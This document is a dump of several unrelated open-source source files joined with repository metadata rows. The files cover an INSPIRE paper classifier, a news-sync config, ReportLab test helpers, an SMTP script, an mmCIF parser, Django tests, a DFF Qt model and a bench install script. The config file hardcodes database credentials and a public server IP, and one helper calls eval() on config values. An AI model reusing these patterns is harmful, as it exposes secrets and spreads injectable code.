# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Set of tasks for classification."""
from functools import wraps
from ..proxies import antihep_keywords
def filter_core_keywords(obj, eng):
"""Filter core keywords."""
result = obj.extra_data.get('classifier_results').get("complete_output")
if result is None:
return
filtered_core_keywords = {}
for core_keyword, times_counted in result.get("Core keywords").items():
if core_keyword not in antihep_keywords:
filtered_core_keywords[core_keyword] = times_counted
result["Filtered Core keywords"] = filtered_core_keywords
obj.extra_data['classifier_results']["complete_output"] = result
def classify_paper(taxonomy, rebuild_cache=False, no_cache=False,
output_limit=20, spires=False,
match_mode='full', with_author_keywords=False,
extract_acronyms=False, only_core_tags=False,
fast_mode=False):
"""Extract keywords from a pdf file or metadata in a OAI harvest."""
@wraps(classify_paper)
def _classify_paper(obj, eng):
from invenio_classifier.errors import ClassifierException
from invenio_classifier import (
get_keywords_from_text,
get_keywords_from_local_file,
)
params = dict(
taxonomy_name=taxonomy,
output_mode='dict',
output_limit=output_limit,
spires=spires,
match_mode=match_mode,
no_cache=no_cache,
with_author_keywords=with_author_keywords,
rebuild_cache=rebuild_cache,
only_core_tags=only_core_tags,
extract_acronyms=extract_acronyms
)
fast_mode = False
try:
# FIXME: May need to find another canonical way of getting PDF
if "pdf" in obj.extra_data:
result = get_keywords_from_local_file(
obj.extra_data["pdf"], **params
)
else:
data = []
titles = obj.data.get('titles')
if titles:
data.extend([t.get('title', '') for t in titles])
abstracts = obj.data.get('abstracts')
if abstracts:
data.extend([t.get('value', '') for t in abstracts])
if not data:
obj.log.error("No classification done due to missing data.")
return
result = get_keywords_from_text(data, **params)
fast_mode = True
except ClassifierException as e:
obj.log.exception(e)
return
result['complete_output'] = clean_instances_from_data(
result.get("complete_output", {})
)
result["fast_mode"] = fast_mode
# Check if it is not empty output before adding
if any(result.get("complete_output", {}).values()):
obj.extra_data['classifier_results'] = result
return _classify_paper
def clean_instances_from_data(output):
"""Check if specific keys are of InstanceType and replace them with their id."""
from invenio_classifier.reader import KeywordToken
new_output = {}
for output_key in output.keys():
keywords = output[output_key]
for key in keywords:
if isinstance(key, KeywordToken):
keywords[key.id] = keywords.pop(key)
new_output[output_key] = keywords
return new_output
| gpl-2.0 | -5,475,445,670,009,735,000 | 36.504425 | 84 | 0.607834 | false |
zhaozhi406/news | config.py | 1 | 1431 | #-*- coding:utf-8 -*-
import logging.config
IMAGE_SIZES = {
"large": (680,382),
"middle": (720, 0),
"small": (226,150 )
}
IMAGE_SAVE_DIR = "/Users/jiangqiurong/Desktop"
mongodb_conn_string = "mongodb://47.88.194.127:27017/"
mysql_config = {
"user": "zhaozhi",
"password": "zzhao",
"host": "47.88.194.127",
"database": "news_test",
"charset": "utf8"
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(asctime)s %(levelname)s [%(filename)s %(funcName)s] %(message)s'
},
},
'filters': {
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file':{
'level': 'DEBUG',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename':'/tmp/sync_news.log',
'when': 'D',
'backupCount':7,
'formatter': 'simple'
}
},
'loggers': {
'sync_news': {
'handlers': ['file'],
'propagate': True,
'level': 'DEBUG',
},
'sync_news_test': {
'handlers': ['console', 'file'],
'propagate': True,
'level': 'DEBUG',
},
}
}
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("sync_news_test")
| mit | 5,140,971,644,401,568,000 | 22.080645 | 89 | 0.47659 | false |
trosa/forca | reportlab/lib/testutils.py | 1 | 11504 | #Copyright ReportLab Europe Ltd. 2000-2008
#see license.txt for license details
__version__='''$Id: testutils.py 3662 2010-02-09 11:23:58Z rgbecker $'''
__doc__="""Provides support for the test suite.
The test suite as a whole, and individual tests, need to share
certain support functions. We have to put these in here so they
can always be imported, and so that individual tests need to import
nothing more than "reportlab.whatever..."
"""
import sys, os, string, fnmatch, copy, re
from ConfigParser import ConfigParser
import unittest
# Helper functions.
def isWritable(D):
try:
fn = '00DELETE.ME'
f = open(fn, 'w')
f.write('test of writability - can be deleted')
f.close()
if os.path.isfile(fn):
os.remove(fn)
return 1
except:
return 0
_OUTDIR = None
RL_HOME = None
testsFolder = None
def setOutDir(name):
"""Is it a writable file system distro being invoked within
test directory? If so, can write test output here. If not,
it had better go in a temp directory. Only do this once per
process"""
global _OUTDIR, RL_HOME, testsFolder
if _OUTDIR: return _OUTDIR
D = [d[9:] for d in sys.argv if d.startswith('--outdir=')]
if D:
_OUTDIR = D[-1]
try:
os.makedirs(_OUTDIR)
except:
pass
for d in D: sys.argv.remove(d)
else:
assert name=='__main__',"setOutDir should only be called in the main script"
scriptDir=os.path.dirname(sys.argv[0])
if not scriptDir: scriptDir=os.getcwd()
_OUTDIR = scriptDir
if not isWritable(_OUTDIR):
_OUTDIR = get_rl_tempdir('reportlab_test')
import reportlab
RL_HOME=reportlab.__path__[0]
if not os.path.isabs(RL_HOME): RL_HOME=os.path.normpath(os.path.abspath(RL_HOME))
topDir = os.path.dirname(RL_HOME)
testsFolder = os.path.join(topDir,'tests')
if not os.path.isdir(testsFolder):
testsFolder = os.path.join(os.path.dirname(topDir),'tests')
if not os.path.isdir(testsFolder):
if name=='__main__':
scriptDir=os.path.dirname(sys.argv[0])
if not scriptDir: scriptDir=os.getcwd()
testsFolder = os.path.abspath(scriptDir)
else:
testsFolder = None
if testsFolder:
sys.path.insert(0,os.path.dirname(testsFolder))
return _OUTDIR
def outputfile(fn):
"""This works out where to write test output. If running
code in a locked down file system, this will be a
temp directory; otherwise, the output of 'test_foo.py' will
normally be a file called 'test_foo.pdf', next door.
"""
D = setOutDir(__name__)
if fn: D = os.path.join(D,fn)
return D
def printLocation(depth=1):
if sys._getframe(depth).f_locals.get('__name__')=='__main__':
outDir = outputfile('')
if outDir!=_OUTDIR:
print 'Logs and output files written to folder "%s"' % outDir
def makeSuiteForClasses(*classes):
"Return a test suite with tests loaded from provided classes."
suite = unittest.TestSuite()
loader = unittest.TestLoader()
for C in classes:
suite.addTest(loader.loadTestsFromTestCase(C))
return suite
def getCVSEntries(folder, files=1, folders=0):
"""Returns a list of filenames as listed in the CVS/Entries file.
'folder' is the folder that should contain the CVS subfolder.
If there is no such subfolder an empty list is returned.
'files' is a boolean; 1 and 0 means to return files or not.
'folders' is a boolean; 1 and 0 means to return folders or not.
"""
join = os.path.join
split = string.split
# If CVS subfolder doesn't exist return empty list.
try:
f = open(join(folder, 'CVS', 'Entries'))
except IOError:
return []
# Return names of files and/or folders in CVS/Entries files.
allEntries = []
for line in f.readlines():
if folders and line[0] == 'D' \
or files and line[0] != 'D':
entry = split(line, '/')[1]
if entry:
allEntries.append(join(folder, entry))
return allEntries
# Still experimental class extending ConfigParser's behaviour.
class ExtConfigParser(ConfigParser):
"A slightly extended version to return lists of strings."
pat = re.compile('\s*\[.*\]\s*')
def getstringlist(self, section, option):
"Coerce option to a list of strings or return unchanged if that fails."
value = ConfigParser.get(self, section, option)
# This seems to allow for newlines inside values
# of the config file, but be careful!!
val = string.replace(value, '\n', '')
if self.pat.match(val):
return eval(val)
else:
return value
# This class as suggested by /F with an additional hook
# to be able to filter filenames.
class GlobDirectoryWalker:
"A forward iterator that traverses files in a directory tree."
def __init__(self, directory, pattern='*'):
self.index = 0
self.pattern = pattern
directory.replace('/',os.sep)
if os.path.isdir(directory):
self.stack = [directory]
self.files = []
else:
from reportlab.lib.utils import isCompactDistro, __loader__, rl_isdir
if not isCompactDistro() or not __loader__ or not rl_isdir(directory):
raise ValueError('"%s" is not a directory' % directory)
self.directory = directory[len(__loader__.archive)+len(os.sep):]
pfx = self.directory+os.sep
n = len(pfx)
self.files = map(lambda x, n=n: x[n:],filter(lambda x,pfx=pfx: x.startswith(pfx),__loader__._files.keys()))
self.stack = []
def __getitem__(self, index):
while 1:
try:
file = self.files[self.index]
self.index = self.index + 1
except IndexError:
# pop next directory from stack
self.directory = self.stack.pop()
self.files = os.listdir(self.directory)
# now call the hook
self.files = self.filterFiles(self.directory, self.files)
self.index = 0
else:
# got a filename
fullname = os.path.join(self.directory, file)
if os.path.isdir(fullname) and not os.path.islink(fullname):
self.stack.append(fullname)
if fnmatch.fnmatch(file, self.pattern):
return fullname
def filterFiles(self, folder, files):
"Filter hook, overwrite in subclasses as needed."
return files
class RestrictedGlobDirectoryWalker(GlobDirectoryWalker):
"An restricted directory tree iterator."
def __init__(self, directory, pattern='*', ignore=None):
GlobDirectoryWalker.__init__(self, directory, pattern)
if ignore == None:
ignore = []
self.ignoredPatterns = []
if type(ignore) == type([]):
for p in ignore:
self.ignoredPatterns.append(p)
elif type(ignore) == type(''):
self.ignoredPatterns.append(ignore)
def filterFiles(self, folder, files):
"Filters all items from files matching patterns to ignore."
indicesToDelete = []
for i in xrange(len(files)):
f = files[i]
for p in self.ignoredPatterns:
if fnmatch.fnmatch(f, p):
indicesToDelete.append(i)
indicesToDelete.reverse()
for i in indicesToDelete:
del files[i]
return files
class CVSGlobDirectoryWalker(GlobDirectoryWalker):
"An directory tree iterator that checks for CVS data."
def filterFiles(self, folder, files):
"""Filters files not listed in CVS subfolder.
This will look in the CVS subfolder of 'folder' for
a file named 'Entries' and filter all elements from
the 'files' list that are not listed in 'Entries'.
"""
join = os.path.join
cvsFiles = getCVSEntries(folder)
if cvsFiles:
indicesToDelete = []
for i in xrange(len(files)):
f = files[i]
if join(folder, f) not in cvsFiles:
indicesToDelete.append(i)
indicesToDelete.reverse()
for i in indicesToDelete:
del files[i]
return files
# An experimental untested base class with additional 'security'.
class SecureTestCase(unittest.TestCase):
"""Secure testing base class with additional pre- and postconditions.
We try to ensure that each test leaves the environment it has
found unchanged after the test is performed, successful or not.
Currently we restore sys.path and the working directory, but more
of this could be added easily, like removing temporary files or
similar things.
Use this as a base class replacing unittest.TestCase and call
these methods in subclassed versions before doing your own
business!
"""
def setUp(self):
"Remember sys.path and current working directory."
self._initialPath = copy.copy(sys.path)
self._initialWorkDir = os.getcwd()
def tearDown(self):
"Restore previous sys.path and working directory."
sys.path = self._initialPath
os.chdir(self._initialWorkDir)
class NearTestCase(unittest.TestCase):
def assertNear(a,b,accuracy=1e-5):
if isinstance(a,(float,int)):
if abs(a-b)>accuracy:
raise AssertionError("%s not near %s" % (a, b))
else:
for ae,be in zip(a,b):
if abs(ae-be)>accuracy:
raise AssertionError("%s not near %s" % (a, b))
assertNear = staticmethod(assertNear)
class ScriptThatMakesFileTest(unittest.TestCase):
"""Runs a Python script at OS level, expecting it to produce a file.
It CDs to the working directory to run the script."""
def __init__(self, scriptDir, scriptName, outFileName, verbose=0):
self.scriptDir = scriptDir
self.scriptName = scriptName
self.outFileName = outFileName
self.verbose = verbose
# normally, each instance is told which method to run)
unittest.TestCase.__init__(self)
def setUp(self):
self.cwd = os.getcwd()
global testsFolder
scriptDir=self.scriptDir
if not os.path.isabs(scriptDir):
scriptDir=os.path.join(testsFolder,scriptDir)
os.chdir(scriptDir)
assert os.path.isfile(self.scriptName), "Script %s not found!" % self.scriptName
if os.path.isfile(self.outFileName):
os.remove(self.outFileName)
def tearDown(self):
os.chdir(self.cwd)
def runTest(self):
fmt = sys.platform=='win32' and '"%s" %s' or '%s %s'
p = os.popen(fmt % (sys.executable,self.scriptName),'r')
out = p.read()
if self.verbose:
print out
status = p.close()
assert os.path.isfile(self.outFileName), "File %s not created!" % self.outFileName
| gpl-2.0 | 6,965,741,556,274,241,000 | 32.546547 | 119 | 0.59362 | false |
zxqzx/scripts | emailmodule.py | 1 | 1669 | #!/usr/bin/env python3
# Import smtplib for the actual sending function
import smtplib
# Import the email modules we'll need
from email.mime.text import MIMEText
import sys
import argparse
#User Options
globalsender = ""
loginrequired = "no"
server = "localhost"
port = "587"
starttls = "no"
username = "username"
password = "password"
#Main Function
def main(to, sender, subject, message, attachment):
msg = MIMEText(message, 'plain')
if attachment == "html":
msg = MIMEText(message, 'html')
if globalsender != "":
sender = globalsender
msg['Subject'] = subject
msg['To'] = to
msg['From'] = sender
#msg['Content-Type'] = "text/html; charset='utf-8'"
#msg['Mime-Version'] = "1.0"
#msg['Content-Transfer-Encoding'] = "base64"
print(msg)
s = smtplib.SMTP(server + ":" + port)
if starttls == "yes":
s.starttls()
if loginrequired == "yes":
s.login(username, password)
s.send_message(msg)
s.quit()
if __name__ == "__main()__":
parser = argparse.ArgumentParser(description='A')
parser.add_argument('-t', '--to', dest='users', nargs = '*',
help='Email address of the receiver.')
parser.add_argument('-s', '--subject', dest = 'subject', nargs = '*',
help = "Subject of the message")
parser.add_argument('-m', '--message', dest = 'message', nargs = '*',
help = "The actual content of the message")
parser.add_argument('-f', '--sender', dest = 'from', nargs = '*',
help = "Who the message is from")
args = parser.parse_args()
to = ", ".join(args.users)
subject = ' '.join(args.subject)
message = ' '.join(args.message)
main(to, sender, subject, message, "plain")
| mit | -3,210,705,563,425,402,000 | 20.960526 | 70 | 0.627322 | false |
haddocking/disvis | disvis/IO/mmcif.py | 1 | 1979 | from __future__ import print_function
import sys
from collections import OrderedDict
import numpy as np
def parse_cif(infile):
if isinstance(infile, file):
pass
elif isinstance(infile, str):
infile = open(infile)
else:
raise TypeError("Input should either be a file or string.")
atom_site = OrderedDict()
with infile as f:
for line in f:
if line.startswith('_atom_site.'):
words = line.split('.')
atom_site[words[1].strip()] = []
if line.startswith('ATOM'):
words = line.split()
for key, word in zip(atom_site, words):
atom_site[key].append(word)
natoms = len(atom_site['id'])
dtype = [('atom_id', np.int64), ('name', np.str_, 4),
('resn', np.str_, 4), ('chain', np.str_, 2),
('resi', np.int64), ('x', np.float64),
('y', np.float64), ('z', np.float64),
('occupancy', np.float64), ('bfactor', np.float64),
('element', np.str_, 2), ('charge', np.str_, 2),
('model', np.int64),
]
cifdata = np.zeros(natoms, dtype=dtype)
cifdata['atom_id'] = np.asarray(atom_site['id'], dtype=np.int64)
cifdata['name'] = atom_site['label_atom_id']
cifdata['resn'] = atom_site['label_comp_id']
cifdata['chain'] = atom_site['label_asym_id']
cifdata['resi'] = atom_site['label_seq_id']
cifdata['x'] = atom_site['Cartn_x']
cifdata['y'] = atom_site['Cartn_y']
cifdata['z'] = atom_site['Cartn_z']
cifdata['occupancy'] = atom_site['occupancy']
cifdata['bfactor'] = atom_site['B_iso_or_equiv']
cifdata['element'] = atom_site['type_symbol'].title()
cifdata['charge'] = atom_site['pdbx_formal_charge']
cifdata['model'] = atom_site['pdbx_PDB_model_num']
return cifdata
if __name__=='__main__':
import sys
infile = sys.argv[1]
data = parse_cif(infile)
| apache-2.0 | 8,828,443,199,216,002,000 | 33.12069 | 68 | 0.54472 | false |
uclouvain/osis | attribution/tests/ddd/domain/test_teacher.py | 1 | 2419 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.test import SimpleTestCase
from attribution.tests.ddd.factories.teacher import TeacherFactory
class TestInitTeacher(SimpleTestCase):
def test_full_name_with_spaces(self):
obj = TeacherFactory(
last_name=" Truc",
first_name=" Machin",
middle_name=" Chose "
)
self.assertEqual(obj.full_name, 'TRUC Machin Chose')
def test_full_name_without_middle_name(self):
obj = TeacherFactory(
last_name=" Truc",
first_name=" Machin",
)
self.assertEqual(obj.full_name, 'TRUC Machin')
class TestTeacherHash(SimpleTestCase):
def test_assert_equals(self):
obj_1 = TeacherFactory(
last_name="Truc",
first_name="Machin",
middle_name="Chose"
)
obj_2 = TeacherFactory(
last_name="Truc",
first_name="Machin",
middle_name="Chose"
)
self.assertEqual(obj_1, obj_2)
def test_assert_not_equals(self):
obj_1 = TeacherFactory()
obj_2 = TeacherFactory()
self.assertNotEqual(obj_1, obj_2)
| agpl-3.0 | -4,446,630,505,314,006,000 | 34.043478 | 87 | 0.612903 | false |
halbbob/dff | api/gui/model/search_model.py | 1 | 16526 | # DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Solal Jacob <[email protected]>
# Romain Bertholon <[email protected]>
#
from PyQt4.QtCore import SIGNAL, QAbstractItemModel, QModelIndex, QVariant, Qt, QDateTime, QSize, QThread, QMutex, QSemaphore
from PyQt4.QtGui import QColor, QIcon, QImage, QImageReader, QPixmap, QPixmapCache, QStandardItemModel, QStandardItem
from PyQt4 import QtCore
import re
from api.types.libtypes import Variant, vtime
from api.vfs.libvfs import VFS
from api.events.libevents import EventHandler
from Queue import *
class SearchModel(QAbstractItemModel, EventHandler):
"""
The VFSItemModel, inheriting QAbstractItemModel, is used by views of the node browser.
Data are fetched directly in the VFS. In QTableView, only two column are always displayed :
* nodes' names
* nodes' size
This is up to users to configure which columns they want to display, according to nodes'
attributes. The currently selected node's children are storedn in the list self.node_list
More documentation on QAbstractItemModel() can be found at :
* http://www.riverbankcomputing.co.uk/static/Docs/PyQt4/html/qabstractitemmodel.html
"""
def __init__(self, __parent = None, event=False, fm = False):
"""
Constructor.
"""
QAbstractItemModel.__init__(self, __parent)
EventHandler.__init__(self)
# init root + some values
self.rootItem = None
self.__parent = __parent
self.VFS = VFS.Get()
self.map = {}
self.imagesthumbnails = None
self.connect(self, SIGNAL("dataImage"), self.setDataImage)
self.translation()
self.fetchedItems = 0
self.thumbQueued = {}
self.fm = fm
self.fm = False
self.checkedNodes = set()
# those list contains nodes' children of the currently selcted node.
self.node_list = []
# list of headers the user choosed to display.
self.header_list = []
self.type_list = []
self.disp_module = 0
self.del_sort = 0
self.cacheAttr = (None, None)
# connect the mode to the VFS to receive its events
if event:
self.VFS.connection(self)
def setFilterRegExp(self, regExp):
return
def Event(self, e):
"""
This method is called when an event is emitted by the VFS (when a node is added into the
VFS for example, and the view needs to be redrawed).
"""
parent = self.rootItem
if parent != None:
self.node_list = parent.children()
# emit signals to redraw the gui
self.emit(SIGNAL("layoutAboutToBeChanged()"))
self.emit(SIGNAL("layoutChanged()"))
def setHeaderData(self, section, orientation, value, role):
"""
\reimp
Add a header data into the header. Emit a `layoutAboutToBeChanged` signal before adding the header
and `layoutChanged` once it is done.
"""
self.emit(SIGNAL("layoutAboutToBeChanged()"))
QAbstractItemModel.setHeaderData(self, section, orientation, value, role)
self.emit(SIGNAL("layoutChanged()"))
def setDataImage(self, index, node, image):
pixmap = QPixmap().fromImage(image)
pixmapCache.insert(str(node.this), pixmap)
self.__parent.currentView().update(index)
def imagesThumbnails(self):
return self.imagesthumbnails
def setRootPath(self, node, kompleter = None):
"""
Set the path of the root node.
"""
self.fetchedItems = 0
typeWorker.clear()
self.rootItem = node
if node != None:
self.sort(HNAME, Qt.AscendingOrder)
if kompleter == None:
self.emit(SIGNAL("rootPathChanged"), node)
self.reset()
def qMin(self, x, y):
"""
Return `x` if it inferior to `y`, `y` otherwise.
"""
if x < y:
return x
else:
return y
def rowCount(self, parent):
"""
\returns the number of children of lines of the index `parent`.
"""
return len(self.node_list)
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""
\reimp
\return the header data which role is `role`, or an invalid QVariant() if the data could
not be fetched.
"""
if role != Qt.DisplayRole:
return QVariant()
nb_s = section - 2 - self.disp_module - self.del_sort
if orientation == Qt.Horizontal:
if section == HNAME:
return QVariant(self.nameTr)
elif section == HSIZE:
return QVariant(self.sizeTr)
elif (self.disp_module != 0) and (section == HMODULE):
return QVariant(self.moduleTr)
elif (self.del_sort != 0):
if (self.disp_module != 0):
if (section == (HMODULE + 1)):
return QVariant(self.deletedTr)
elif section == HMODULE:
return QVariant(self.deletedTr)
if nb_s >= (len(self.header_list) + len(self.type_list)):
return QVariant()
elif nb_s >= len(self.header_list):
return QVariant(self.type_list[nb_s - len(self.header_list)])
else:
return QVariant(self.header_list[nb_s])
def data(self, index, role):
"""
\reimp
Data which can be fetched differs from one view to another and also depends on users configuration.
Each nodes' attributes can be displayed in views, or hidden, depending on what users want to
display. The only two columns always displayed are node's name and nodes' size (`HNAME` and `HSIZE`
columns).
The mand types of informations that can be displayed, in addition on names and sizes, are :
* the name of the module who generated the node
* the MAC time of the nodes (if any)
* the mimi-type of the node
* all dynamic extended attributes of the node.
* a flag indicating if the node is deleted or not
Sorting can be performed on all the data by clicking in the correponding header.
\param index the index where the data is located
\param role the role of the data
\return the data which index is `index` and role is `role`, or an invalid QVariant if
the date is invalid.
"""
if not index.isValid():
return QVariant()
if index.row() > len(self.node_list) or index.row() < 0:
return QVariant()
node = self.node_list[index.row()]
column = index.column()
if role == Qt.DisplayRole :
# return name, size and eventually module columns
if column == HNAME:
return QVariant(node.name())
if column == HSIZE:
return QVariant(node.size())
if (self.disp_module != 0) and (column == HMODULE):
return QVariant(node.fsobj().name)
elif (self.del_sort != 0):
if (self.disp_module != 0):
if (column == (HMODULE + 1)):
return QVariant(node.isDeleted())
elif column == HMODULE:
return QVariant(node.isDeleted())
# return attributes and type columns
try :
nb_c = column - 2 - self.disp_module - self.del_sort
if nb_c >= (len(self.header_list) + len(self.type_list)):
return QVariant() # index error
elif nb_c >= len(self.header_list): # the data is a dataType
type = self.type_list[nb_c - len(self.header_list)]
possible_type = node.dataType().value()
return QVariant(possible_type[str(type)].value())
else:
if self.cacheAttr[0] != long(node.this):
self.cacheAttr = (long(node.this), node.fsoAttributes())
attr = self.cacheAttr[1]
value = attr[str(self.header_list[nb_c])]
val = value.value()
if val == None:
return QVariant(" N / A ")
if value.type() == 13:
return QVariant(QDateTime(val.get_time()))
else:
return QVariant(val)
except IndexError:
return QVariant()
return QVariant()
# returns data corresponding to the role passed in parameter to data() method (icon, background,
# etc.)
if role == Qt.ForegroundRole:
if column == 0:
if node.isDeleted():
return QVariant(QColor(Qt.red))
if role == Qt.DecorationRole:
if column == HNAME:
if not self.imagesthumbnails:
return QVariant(QIcon(node.icon()))
else:
mtype = str(node.dataType())
if mtype.find("broken") != -1:
return QVariant(QIcon(":file_broken.png"))
pixmap = pixmapCache.find(str(node.this))
if pixmap:
return QVariant(QIcon(pixmap))
elif typeWorker.isImage(mtype):
typeWorker.enqueue(self, index, node)
return QVariant(QIcon(":file_temporary.png"))
return QVariant(QIcon(node.icon()))
if role == Qt.CheckStateRole:
if column == HNAME:
if (long(node.this), 0) in self.checkedNodes:
if node.hasChildren():
return Qt.PartiallyChecked
else:
return Qt.Checked
elif (long(node.this), 1) in self.checkedNodes:
return Qt.Checked
else:
return Qt.Unchecked
return QVariant()
def setImagesThumbnails(self, flag):
"""
Set the image thumbnail.
"""
self.imagesthumbnails = flag
def columnCount(self, parent = QModelIndex()):
"""
\reimp
This number is variable, depending on the configuration.
\return the number of displayed columns (at least 2, name and size columns)
"""
# 2 is for columns names and sizes
return len(self.header_list) + 2 + len(self.type_list) \
+ self.disp_module + self.del_sort
def index(self, row, column, parent = QModelIndex()):
"""
\reimp
Get the index located at row `row` and column `column`, which parent is `parent`. Create the index
if it does note exist by calling QAbstractItemModel.createIndex()
\param row the row where the index should be located.
\param column the column where the index should be located.
\param parent the parent of the index (invalid QModelIndex by default, corresponding to root node).
\return the index, or an invalid index if an error occured.
"""
if not self.hasIndex(row, column, parent):
return QModelIndex()
if parent.isValid():
parentItem = self.VFS.getNodeFromPointer(parent.internalId())
else:
parentItem = self.rootItem
if row < len(self.node_list):
childItem = self.node_list[row]
else:
return QModelIndex()
index = self.createIndex(row, column, long(childItem.this))
return index
def parent(self, index):
"""
\reimp
\return the parent index of `index` or an invalid QModelIndex if an erroc occurs.
"""
if not index.isValid():
return QModelIndex()
childItem = self.VFS.getNodeFromPointer(index.internalId())
parentItem = childItem.parent()
if parentItem.this == self.rootItem.this:
return QModelIndex()
index = self.createIndex(parentItem.at() , 0, long(parentItem.this))
return index
def hasChildren(self, parent):
"""
\reimp
\return `True` if index `parent` has at least one child, `False` the otherwise.
"""
if not parent.isValid():
self.parentItem = self.rootItem
return self.rootItem.hasChildren()
else:
self.parentItem = self.VFS.getNodeFromPointer(parent.internalId())
return self.parentItem.hasChildren()
def setData(self, index, value, role):
"""
\reimp
Set the data which value is `value` at index `index` with role `role`.
\return `True` if no error occured, `False` otherwise.
"""
if not index.isValid():
return QVariant()
if role == Qt.CheckStateRole:
column = index.column()
if column == HNAME:
node = self.VFS.getNodeFromPointer(index.internalId())
if value == Qt.Unchecked:
if (long(node.this), 0) in self.checkedNodes:
self.checkedNodes.remove((long(node.this), 0))
else:
self.checkedNodes.remove((long(node.this), 1))
elif value == Qt.PartiallyChecked:
self.checkedNodes.add((long(node.this), 0))
elif value == Qt.Checked:
if node.hasChildren():
if (long(node.this), 0) not in self.checkedNodes:
self.checkedNodes.add((long(node.this), 0))
else:
self.checkedNodes.remove((long(node.this), 0))
self.checkedNodes.add((long(node.this), 1))
else:
self.checkedNodes.add((long(node.this) , 1))
return True #return true if ok
def flags(self, flag):
"""
\reimp
\return the Qt.ItemFlags of the model.
"""
return (Qt.ItemIsSelectable | Qt.ItemIsUserCheckable | Qt.ItemIsTristate | Qt.ItemIsEnabled )
def dataTypeByKey(self, stype, node):
try:
return node.dataType().value()[str(stype)].value()
except IndexError:
return None
def fsoAttributesByKey(self, stype, node):
try:
val = node.fsoAttributes()[stype]
if isinstance(val.value(), vtime):
return val.value().get_time()
return val
except IndexError:
return Variant()
def sort(self, column, order):
"""
\reimp
Overload of the sort method used to sort data in the view, according to a given column.
It calls the `sorted()` python built-in function, which documentation can be found at :
* http://wiki.python.org/moin/HowTo/Sorting/
Emit a `layoutAboutToBeChanged()` signal before sorting, and a `layoutChanged()` signal once
the sorting is finished. It can a few seconds on important data volumes.
\param column the column on which the user wants to perform the sorting.
\param the order in which the user wants to sort (`Qt.DescendingOrder` or `Qt.AscendingOrder`).
"""
parentItem = self.rootItem
if parentItem == None:
return
children_list = parentItem.children()
if order == Qt.DescendingOrder:
Reverse = True
else:
Reverse = False
self.emit(SIGNAL("layoutAboutToBeChanged()"))
if column == HNAME: # sort by name
self.node_list = sorted(children_list, key=lambda Node: Node.name(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif column == HSIZE: # sort be size
self.node_list = sorted(children_list, key=lambda Node: Node.size(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif (self.disp_module == 1) and (column == HMODULE): # sort by module's name
self.node_list = sorted(children_list, key=lambda Node: Node.fsobj(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif (self.del_sort != 0):
if (self.disp_module != 0):
if (column == (HMODULE + 1)): # sort by deleted falg
self.node_list = sorted(children_list, key=lambda Node: Node.isDeleted(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif column == HMODULE:
self.node_list = sorted(children_list, key=lambda Node: Node.isDeleted(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
if (column - 2) >= (len(self.header_list) + len(self.type_list)): # default sorting if column is out of range
self.node_list = sorted(children_list, key=lambda Node: Node.name(), reverse=Reverse)
elif column - 2 >= len(self.header_list): # sorting on the mime type
type = self.type_list[column - 2 - len(self.header_list)]
self.node_list = sorted(children_list, \
key= lambda Node: self.dataTypeByKey(str(type), Node), \
reverse=Reverse)
else: # sort on an extended attribute.
self.node_list = sorted(children_list, \
key=lambda Node: self.fsoAttributesByKey(str(self.header_list[column - 2]), Node), \
reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
def translation(self):
"""
Used for translating the framework.
"""
self.nameTr = self.tr('Name')
self.sizeTr = self.tr('Size')
self.ATimeTr = self.tr('Accessed time')
self.CTimeTr = self.tr('Changed time')
self.MTimeTr = self.tr('Modified time')
self.moduleTr = self.tr('Module')
self.deletedTr = self.tr('Deleted')
| gpl-2.0 | -762,149,715,988,854,500 | 33.645702 | 125 | 0.63863 | false |
bailabs/bench-v7 | install.py | 1 | 10678 | # wget setup_frappe.py | python
import os, sys, subprocess, getpass, json, multiprocessing, shutil, platform
from distutils.spawn import find_executable
tmp_bench_repo = '/tmp/bench-v7'
def install_bench(args):
check_distribution_compatibility()
check_brew_installed()
# pre-requisites for bench repo cloning
install_package('curl')
install_package('wget')
success = run_os_command({
'apt-get': [
'sudo apt-get update',
'sudo apt-get install -y git build-essential python-setuptools python-dev libffi-dev libssl-dev'
],
'yum': [
'sudo yum groupinstall -y "Development tools"',
'sudo yum install -y epel-release redhat-lsb-core git python-setuptools python-devel openssl-devel libffi-devel'
],
# epel-release is required to install redis, so installing it before the playbook-run.
# redhat-lsb-core is required, so that ansible can set ansible_lsb variable
})
if not find_executable("git"):
success = run_os_command({
'brew': 'brew install git'
})
